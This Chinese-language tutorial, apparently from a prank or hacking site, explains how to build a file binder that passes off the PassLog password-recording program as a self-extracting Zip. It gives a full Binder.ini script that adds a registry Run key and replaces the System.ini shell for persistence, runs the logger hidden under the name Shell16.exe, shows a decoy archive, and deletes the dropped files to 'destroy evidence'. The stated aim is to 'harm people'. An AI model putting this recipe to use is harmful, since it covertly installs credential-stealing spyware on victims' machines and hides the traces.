市面上的那些“文件捆绑器”只能将捆绑的文件释放到临时目录直接运行,并不提供安装功能,需要被捆绑的程序自我安装;本站的恶作剧程序这么多,但都只能演示一下效果,并不自动安装。让我们自己打造一个文件捆绑器吧!
不多说了,先下载了需要的文件和附带的源代码研究一下,我们用自制的捆绑器制作一个自安装程序试试。
就选用PassLog密码录制程序作试验吧,我们把它伪装成一个自解压Zip文件(捆绑器自身图标用的就是Zip自解压的图标)。首先,把需要的程序PassLog下载下来,然后再制作一个真正的Zip包myZip.exe,以便掩人耳目。
然后,创建一个名叫Binder.ini的文本文件,根据你安装的需要写安装脚本如下:[regs]
1=HKLM,Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SysMon,\wShell16.exe,s
[inis]
1=\wSystem.ini,boot,shell,Explorer.exe Shell16.exe
[commands]
1=command.com /c copy \"\ePassLog.exe\" \"\wShell16.exe\",wh
2=\wshell16.exe
3=\emyZip.exe,w
[removes]
1=\ePassLog.exe
2=\emyZip.exe
在该文件中,如用到“\”,需要写两遍。为了保证通用性,本程序还使用预设路径名:“\e”表示捆绑程序释放的目录,“\w”表示Windows目录,“\s”表示System目录,“\t”表示临时目录。如果你用到桌面路径,可以这样写:\wDesktop。
[regs]字段表示要求修改注册表,[inis]字段表示修改ini,内容都很容易看明白,这是将该程序设置为启动时自动运行。[Commands]字段表示的是运行指定程序,逗号后面接w表示要求程序暂时不向下继续运行,而要等待指定的命令执行完毕,接h表示让该命令运行时不可见。w和h可以同时使用。
最后的[removes]字段将指定的文件删除,可以用来毁灭罪证,哈哈!
写完Ini文件后,将以上三个文件打包为Cab文件,然后用第一期的害人专家BadMake.exe将Binder.exe文件和这个Cab文件连在一起(Cab为Badguy),就可以用来害人了。
这个程序的功能非常强大,只是操作很繁琐。下期将推出VB制作的GUI外壳,可以大大简化操作,记得来看哟!